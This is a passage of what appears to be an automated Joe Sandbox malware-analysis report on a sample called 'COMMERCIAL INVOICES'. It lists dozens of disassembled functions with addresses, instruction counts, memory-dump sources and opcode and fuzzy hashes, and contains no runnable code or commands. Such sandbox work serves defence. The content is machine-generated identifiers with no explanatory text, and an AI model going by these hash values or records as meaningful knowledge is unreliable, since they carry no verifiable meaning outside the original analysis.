                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                      • Instruction ID: a3c111fecc9b29785fae6284c074c79f2bd8c9514612c3ac061919ae2f4ab948
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7E0C2343503468FE719DF19C050B637BB6BFD5A10F28C168AA488F205EB32E842CB40
                                                                                                                                                                                                                                      Function 0127CA38 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 758a29a1c1a71563ee0b6f9843346ff09dc55a40b24140097b30febb65f50475
                                                                                                                                                                                                                                      • Instruction ID: c6b550e4e2d854e3f7066df9d7c9a8b2a22aa746049b9ffbc24dfacd01ad0412
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 758a29a1c1a71563ee0b6f9843346ff09dc55a40b24140097b30febb65f50475
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3BD02B324B10726ACB76F9387C04FA33A5D9B50321F014860F608D2010D574CCA193C8
                                                                                                                                                                                                                                      Function 0123823B Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                      • Instruction ID: cb8498139ebf10dfabd05b95dfac10b54c622b44173b81e4229b31b0b160c76f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F0E0C231132A51EFDB323F29EC01F6176E5FF94B50F214A29F1810A4A487B4AC81CB44
                                                                                                                                                                                                                                      Function 01242050 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b21258148ba9201e1965a7c178fe07931033199b79c4a31cb8a9337547c87e7b
                                                                                                                                                                                                                                      • Instruction ID: 6aec2b4570fb07ac9a4788a878ac162edf30ee50cb5b309cc515a39ee73a6662
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b21258148ba9201e1965a7c178fe07931033199b79c4a31cb8a9337547c87e7b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADE0C232110490AFC316FF5EED41F6A739EEFA43B0F000221F1518B290CA30AD40C7A8
                                                                                                                                                                                                                                      Function 01296AA4 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                      • Instruction ID: d20e2d4467e5cbe41983db7757a0c160f6083dc5b51214f8af18e8b8cde0fe85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2a1cd49be4a36f16e465d6e8719326e712c3afc978f3fe3bf45b66f7a6b88852
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71D05E36521A50AFC7329F1BEA00C13BBF9FBC5B51705062EE54583920C674A806CBA0
                                                                                                                                                                                                                                      Function 0127E59C Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                      • Instruction ID: 2cc1ad43c599077ac7a04d1bafc9471c6ec66a32c21564ae6d6fc6fb4ca8d522
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2DD0A932624620ABDB72AA1CFC40FD333E8BB887A1F0A0459F208C7150C360AC81CA84
                                                                                                                                                                                                                                      Function 012BE908 Relevance: .0, Instructions: 16COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                      • Instruction ID: 5fbf90edb0299b31a79679a8227c265daa3b76598567c3950157393949c1278a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 47E0EC35960A859BDF56DF59C680F9ABBB5FB94B80F160054A5485B660C634AD00CB40
                                                                                                                                                                                                                                      Function 0123A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                      • Instruction ID: 7a8b805f65032104e46e7d37838fb21ccb1b4b0bd5790fc9e704039619ddce0b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 83D0223223203193CB2896556800F63AA05ABC0AD0F0A003C790AE3800C0148C42C2E0
                                                                                                                                                                                                                                      Function 0127A830 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                      • Instruction ID: 48d10f4964bc8590b6163a1ebee99df84aa8d36bb6cc4e19b6a0986ad2f2d883
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 01D012371E054DBBCB11DF66DC41FA57BA9E764BA0F445020F904875A0C63AE950D684
                                                                                                                                                                                                                                      Function 0127CA24 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f0d77a04ea086e7b54d2243c3300f37eaae848fc4db89010a82583a457dbdd8a
                                                                                                                                                                                                                                      • Instruction ID: b6f7ac0754eaf71a978c44ccde4f88ef01df145653adbff66ac2181b7b2b5615
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f0d77a04ea086e7b54d2243c3300f37eaae848fc4db89010a82583a457dbdd8a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A1D09E345755039BDF16EF59C55197A7E78EB14781F400068E70561520D339DD519650
                                                                                                                                                                                                                                      Function 012502A0 Relevance: .0, Instructions: 13COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                      • Instruction ID: 06016b34d23eedc827db7d74fc16c8a83507611d0bc215befebca9aed157c9f8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AD0C935222E81CFD76BCB1DC9A4B1573A4BB44B84FC50490F901CBB22D6BCD940CA04
                                                                                                                                                                                                                                      Function 0127C700 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                      • Instruction ID: 42b90ba18c1f48c65b32ff380874db4890968e65c49d8a9fc8eee8eb02b6d0d8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66C012322A0648AFC712EA99CD41F127BA9EBA8B80F000021F6048B670C631E820EA84
                                                                                                                                                                                                                                      Function 01260310 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                      • Instruction ID: 076fc2ecc0e9dae7acd5d0d442dc3a5e344c784a6a85ccbaf6594c42a8ae8b77
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DD01236110288EFCB05DF41C890DAA772AFBD8710F108019FD19076508A31ED62DA50
                                                                                                                                                                                                                                      Function 01240750 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                      • Instruction ID: 8c3ac194cea7fd037e0dbc2b8176c4dca1d8171389815cff91004c8d9725355b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCC04C757115428FCF15DB1DD2D4F5577F4F744740F151890E945CB721E624E801CA10
                                                                                                                                                                                                                                      Function 01284340 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 125b38c3d33fb6589a0ee378e1305ec3b4205d74117977aaaa9d852988c90053
                                                                                                                                                                                                                                      • Instruction ID: 7532fb9786c1fc431f30e934fda9e2d3b30e72268c84da6b3e9c79dad5d826bc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 125b38c3d33fb6589a0ee378e1305ec3b4205d74117977aaaa9d852988c90053
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31900231615804129640715C48845464005A7E1301B59C011E1428554CCA188A565365
                                                                                                                                                                                                                                      Function 01284650 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ee8e8d8c04e11346d194a5af158712addaef825d9ae5f3d3db03e4bd7b14bf62
                                                                                                                                                                                                                                      • Instruction ID: 20a42c3c458dd62d5ca0bef2af0c37bda7fe3d1c49c71b45bff526197cf434ba
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ee8e8d8c04e11346d194a5af158712addaef825d9ae5f3d3db03e4bd7b14bf62
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7900261611504424640715C48044066005A7E2301399C115A1558560CC61C8955936D
                                                                                                                                                                                                                                      Function 01282BA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: ef437922c606a098d01ee68889c3a07024c3b6600079c4d620abf6dd9cdcee12
                                                                                                                                                                                                                                      • Instruction ID: 554672a34297e86567764a8557859dc3d65e5014d65b97c2f9ee55f9c585472c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef437922c606a098d01ee68889c3a07024c3b6600079c4d620abf6dd9cdcee12
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC90023161540C02D650715C4414746000597D1301F59C011A1028654DC7598B5577A5
                                                                                                                                                                                                                                      Function 01282B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 580c4776220cd56ad6d36e910eeb6ccd60534f2c80b6d4a65df98032b67376f7
                                                                                                                                                                                                                                      • Instruction ID: 4706f12a0d2e1fe4d20a5628088c20936a9373da80e48092af7d9b69411cd281
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 580c4776220cd56ad6d36e910eeb6ccd60534f2c80b6d4a65df98032b67376f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A690023121140C02D604715C4804686000597D1301F59C011A7028655ED66989917235
                                                                                                                                                                                                                                      Function 01282BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: e4fd6bc12eb87b8b04a612cbe6149e7feefa7ced2a6eab4c1c5441bfb30d858a
                                                                                                                                                                                                                                      • Instruction ID: 5c08063840f88e11168e29d8dccea1d1e30ffa06a2c8d21b55701cf443561e87
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e4fd6bc12eb87b8b04a612cbe6149e7feefa7ced2a6eab4c1c5441bfb30d858a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B90023121544C42D640715C4404A46001597D1305F59C011A1068694DD6298E55B765
                                                                                                                                                                                                                                      Function 01282BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 9bb82c52e590b71f3683a32b1a4d2544fe1030b740f287ea0f523b6d4ed74fed
                                                                                                                                                                                                                                      • Instruction ID: 54e9a296743353f46a5cea0b57ae6e1c72ad34aed200a28686354106e2cb1a8a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb82c52e590b71f3683a32b1a4d2544fe1030b740f287ea0f523b6d4ed74fed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4190023121140C02D680715C440464A000597D2301F99C015A1029654DCA198B5977A5
                                                                                                                                                                                                                                      Function 01282AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 960b7caafd3069e254bcd9e475b266f096359dcdc7220d1bd63b8b442a290d16
                                                                                                                                                                                                                                      • Instruction ID: 11bba9af80c132e39d69b9e326b6ef74043eb299a7ead9f4754d016baad0de11
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 960b7caafd3069e254bcd9e475b266f096359dcdc7220d1bd63b8b442a290d16
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D69002A1211544924A00B25C8404B0A450597E1201B59C016E2058560CC52989519239
                                                                                                                                                                                                                                      Function 01282AF0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 3205a5d714111b9cdbbd2e1b7e847140ca1807424ca20ec3304d2a90bcb1d284
                                                                                                                                                                                                                                      • Instruction ID: dd0f0028596ce8996bbeefa705637511684426686a3ee1198477796e3c21102b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3205a5d714111b9cdbbd2e1b7e847140ca1807424ca20ec3304d2a90bcb1d284
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4900225231404020645B55C060450B0445A7D7351399C015F241A590CC62589655325
                                                                                                                                                                                                                                      Function 01282AD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: b89acafeb8086118a1563131ff47d1397f2b9df47e1ac90edaf6e22ad24d174a
                                                                                                                                                                                                                                      • Instruction ID: 8e182c8bd63c261dde52834dcad7277aa6db749c981958799ff89191e1bb75ac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b89acafeb8086118a1563131ff47d1397f2b9df47e1ac90edaf6e22ad24d174a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89900225221404030605B55C0704507004697D6351359C021F2019550CD62589615225
                                                                                                                                                                                                                                      Function 01282D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7d1f94bc4175d7e5956d0d04541c56675cf4d8c6e9616c00c1fb36315e4b7fed
                                                                                                                                                                                                                                      • Instruction ID: 985a1b485c32f9820bdeb9073e32ce0f11885f528a6af6477bc7b9ad46ba65e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7d1f94bc4175d7e5956d0d04541c56675cf4d8c6e9616c00c1fb36315e4b7fed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4F90022131140403D640715C54186064005E7E2301F59D011E1418554CD91989565326
                                                                                                                                                                                                                                      Function 01282D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: d22ff452b561811b4b444561d6bb1e4518ae270bd7305b35f1000cd1cc344714
